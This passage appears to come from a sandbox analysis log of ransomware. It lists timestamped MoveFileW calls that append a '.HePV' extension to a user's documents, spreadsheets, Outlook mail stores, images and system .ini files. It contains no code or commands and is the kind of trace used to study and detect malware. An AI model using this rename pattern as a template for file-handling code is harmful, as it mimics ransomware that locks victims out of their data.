"c:\\users\\eebsym5\\documents\\exjzdxjf x\\dgqb2x.ots.hepv")) returned 1 [0051.773] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\Ih5F4uTBa8SZ p752W4.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\ih5f4utba8sz p752w4.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\Ih5F4uTBa8SZ p752W4.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\ih5f4utba8sz p752w4.xlsx.hepv")) returned 1 [0051.786] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\nuyI16ZC.ots" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\nuyi16zc.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\nuyI16ZC.ots.HePV" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\nuyi16zc.ots.hepv")) returned 1 [0051.790] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\QxK3gxYk8.ots" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\qxk3gxyk8.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\QxK3gxYk8.ots.HePV" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\qxk3gxyk8.ots.hepv")) returned 1 [0051.803] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\r_FrwF0zDI3q.docx" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\r_frwf0zdi3q.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\r_FrwF0zDI3q.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\r_frwf0zdi3q.docx.hepv")) returned 1 [0051.833] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\EZb 5mCCKh.docx" (normalized: "c:\\users\\eebsym5\\documents\\ezb 5mcckh.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\EZb 5mCCKh.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\ezb 5mcckh.docx.hepv")) returned 1 [0051.839] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\gw4KPKu.pptx" (normalized: "c:\\users\\eebsym5\\documents\\gw4kpku.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\gw4KPKu.pptx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\gw4kpku.pptx.hepv")) returned 1 [0051.854] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\hp 49EWPNtmDjpH.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\hp 49ewpntmdjph.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\hp 49EWPNtmDjpH.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\hp 49ewpntmdjph.xlsx.hepv")) returned 1 [0051.861] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\IO75.docx" (normalized: "c:\\users\\eebsym5\\documents\\io75.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\IO75.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\io75.docx.hepv")) returned 1 [0051.876] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\ml9pSGffNNqcRjwM_.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ml9psgffnnqcrjwm_.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\ml9pSGffNNqcRjwM_.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\ml9psgffnnqcrjwm_.xlsx.hepv")) returned 1 [0051.879] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini.hepv")) returned 1 [0051.907] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oODJS7TKuDi2G.pdf" (normalized: "c:\\users\\eebsym5\\documents\\oodjs7tkudi2g.pdf"), lpNewFileName="c:\\users\\eebsym5\\documents\\oODJS7TKuDi2G.pdf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oodjs7tkudi2g.pdf.hepv")) returned 1 [0051.913] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\6pyNh7G.csv" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\6pynh7g.csv"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\6pyNh7G.csv.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\6pynh7g.csv.hepv")) returned 1 [0051.921] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\6u7cQlV2Yc7 AApv.pdf" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\6u7cqlv2yc7 aapv.pdf"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\6u7cQlV2Yc7 AApv.pdf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\6u7cqlv2yc7 aapv.pdf.hepv")) returned 1 [0051.934] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\cH -GyeXvIn_MRDn.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\ch -gyexvin_mrdn.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\cH -GyeXvIn_MRDn.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\ch -gyexvin_mrdn.xlsx.hepv")) returned 1 [0051.941] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\ouKm7wa6be3f.docx" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\oukm7wa6be3f.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\ouKm7wa6be3f.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\oukm7wa6be3f.docx.hepv")) returned 1 [0051.947] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\T9cHl2jCFn XY.csv" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\t9chl2jcfn xy.csv"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\T9cHl2jCFn XY.csv.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\t9chl2jcfn xy.csv.hepv")) returned 1 [0051.970] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\TGjVK2tf.rtf" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\tgjvk2tf.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\TGjVK2tf.rtf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\tgjvk2tf.rtf.hepv")) returned 1 [0051.981] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\4qN_1NsdmGu6iObg.pps" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\4qn_1nsdmgu6iobg.pps"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\4qN_1NsdmGu6iObg.pps.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\4qn_1nsdmgu6iobg.pps.hepv")) returned 1 [0052.002] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\EdyrIt5hDiki.pps" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\edyrit5hdiki.pps"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\EdyrIt5hDiki.pps.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\edyrit5hdiki.pps.hepv")) returned 1 [0052.005] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\fge-HstNr6FR.xls" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\fge-hstnr6fr.xls"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\fge-HstNr6FR.xls.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\fge-hstnr6fr.xls.hepv")) returned 1 [0052.009] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\jFkUtyUm6 SFXcEq35H6.xls" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\jfkutyum6 sfxceq35h6.xls"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\jFkUtyUm6 SFXcEq35H6.xls.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\jfkutyum6 sfxceq35h6.xls.hepv")) returned 1 [0052.015] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\R5U2yAni5mnaARfFIO.ods" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\r5u2yani5mnaarffio.ods"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\R5U2yAni5mnaARfFIO.ods.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\r5u2yani5mnaarffio.ods.hepv")) returned 1 [0052.017] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\twwqX CICS9bp4njP.ods" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\twwqx cics9bp4njp.ods"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\twwqX CICS9bp4njP.ods.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\twwqx cics9bp4njp.ods.hepv")) returned 1 [0052.031] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\UJav8zr riHfGVLNl.docx" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\ujav8zr rihfgvlnl.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\UJav8zr riHfGVLNl.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\ujav8zr rihfgvlnl.docx.hepv")) returned 1 [0052.071] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), lpNewFileName="c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst.HePV" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst.hepv")) returned 1 [0052.098] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\outlook files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), lpNewFileName="c:\\users\\eebsym5\\documents\\outlook files\\Outlook Data File - mail.pst.HePV" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst.hepv")) returned 1 [0052.111] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\owsONdl-Vmj8Rfxu.docx" (normalized: "c:\\users\\eebsym5\\documents\\owsondl-vmj8rfxu.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\owsONdl-Vmj8Rfxu.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\owsondl-vmj8rfxu.docx.hepv")) returned 1 [0052.128] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\Q8PRpUC.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\q8prpuc.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\Q8PRpUC.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\q8prpuc.xlsx.hepv")) returned 1 [0052.133] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\R2t5PJlrNIbNzAPi.pptx" (normalized: "c:\\users\\eebsym5\\documents\\r2t5pjlrnibnzapi.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\R2t5PJlrNIbNzAPi.pptx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\r2t5pjlrnibnzapi.pptx.hepv")) returned 1 [0052.138] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\rQJB97cMz9uLb sUcGr.docx" (normalized: "c:\\users\\eebsym5\\documents\\rqjb97cmz9ulb sucgr.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\rQJB97cMz9uLb sUcGr.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\rqjb97cmz9ulb sucgr.docx.hepv")) returned 1 [0052.143] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\r_FEv.pptx" (normalized: "c:\\users\\eebsym5\\documents\\r_fev.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\r_FEv.pptx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\r_fev.pptx.hepv")) returned 1 [0052.147] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\vJ222xuqmnMBs.pptx" (normalized: "c:\\users\\eebsym5\\documents\\vj222xuqmnmbs.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\vJ222xuqmnMBs.pptx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\vj222xuqmnmbs.pptx.hepv")) returned 1 [0052.152] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\downloads\\desktop.ini" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\downloads\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini.hepv")) returned 1 [0052.164] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\favorites\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini.hepv")) returned 1 [0052.174] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\favorites\\links\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini.hepv")) returned 1 [0052.178] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\links\\Suggested Sites.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\links\\Suggested Sites.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url.hepv")) returned 1 [0052.180] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\links\\Web Slice Gallery.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url.hepv")) returned 1 [0052.190] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Autos.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url.hepv")) returned 1 [0052.195] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Entertainment.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url.hepv")) returned 1 [0052.197] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Money.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url.hepv")) returned 1 [0052.199] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Sports.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url.hepv")) returned 1 [0052.201] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url.hepv")) returned 1 [0052.204] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSNBC News.url.HePV" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url.hepv")) returned 1 [0052.217] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\links\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini.hepv")) returned 1 [0052.225] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\music\\desktop.ini" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\music\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini.hepv")) returned 1 [0052.237] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\ntuser.ini" (normalized: "c:\\users\\eebsym5\\ntuser.ini"), lpNewFileName="c:\\users\\eebsym5\\ntuser.ini.HePV" (normalized: "c:\\users\\eebsym5\\ntuser.ini.hepv")) returned 1 [0052.246] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\pictures\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini.hepv")) returned 1 [0052.272] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\09B4wyIx9zT33.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\09b4wyix9zt33.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\09B4wyIx9zT33.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\09b4wyix9zt33.bmp.hepv")) returned 1 [0052.279] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\3M8AoFu FfCq8.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\3m8aofu ffcq8.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\3M8AoFu FfCq8.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\3m8aofu ffcq8.jpg.hepv")) returned 1 [0052.287] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\AwGsNOF2F.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\awgsnof2f.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\AwGsNOF2F.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\awgsnof2f.bmp.hepv")) returned 1 [0052.297] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\TYtHubl15vW1yOtrB.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\tythubl15vw1yotrb.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\TYtHubl15vW1yOtrB.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\tythubl15vw1yotrb.bmp.hepv")) returned 1 [0052.303] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\BrZ8p4yXJzyKTivHgC.png" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\brz8p4yxjzyktivhgc.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\BrZ8p4yXJzyKTivHgC.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\brz8p4yxjzyktivhgc.png.hepv")) returned 1 [0052.307] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\WJCU7Gtt0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\wjcu7gtt0.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\WJCU7Gtt0.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\wjcu7gtt0.jpg.hepv")) returned 1 [0052.317] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\JfMyI.png" (normalized: "c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\jfmyi.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\JfMyI.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\jfmyi.png.hepv")) returned 1 [0052.323] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\JnqdBtVfgIlNYW8O2gt.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\jnqdbtvfgilnyw8o2gt.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\JnqdBtVfgIlNYW8O2gt.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\mw7_qp2tajy2\\jnqdbtvfgilnyw8o2gt.jpg.hepv")) returned 1 [0052.331] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\8Ts0uAQM9t.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\8ts0uaqm9t.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\8Ts0uAQM9t.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\8ts0uaqm9t.bmp.hepv")) returned 1 [0052.345] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\d4M7Pb.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\d4m7pb.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\d4M7Pb.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\feu2p9pnj\\d4m7pb.bmp.hepv")) returned 1 [0052.356] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\L6Fb6hqbzj9MiN-ofUN.png" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\l6fb6hqbzj9min-ofun.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\L6Fb6hqbzj9MiN-ofUN.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\l6fb6hqbzj9min-ofun.png.hepv")) returned 1 [0052.366] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\mGT0p_Tr.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\mgt0p_tr.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\mGT0p_Tr.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\mgt0p_tr.bmp.hepv")) returned 1 [0052.372] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\y-zQFZJ.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\y-zqfzj.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\y-zQFZJ.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\y-zqfzj.jpg.hepv")) returned 1 [0052.377] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\-Fpr-sZrBju7OkCv-3m.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\-fpr-szrbju7okcv-3m.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\-Fpr-sZrBju7OkCv-3m.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\-fpr-szrbju7okcv-3m.jpg.hepv")) returned 1 [0052.385] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\Bce_d-XMAoTaX.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\bce_d-xmaotax.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\Bce_d-XMAoTaX.bmp.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\bce_d-xmaotax.bmp.hepv")) returned 1 [0052.388] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\eba e clRM.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\eba e clrm.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\eba e clRM.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\eba e clrm.jpg.hepv")) returned 1 [0052.392] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\N Aw.png" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\n aw.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\N Aw.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\ygtgn0buov\\n aw.png.hepv")) returned 1 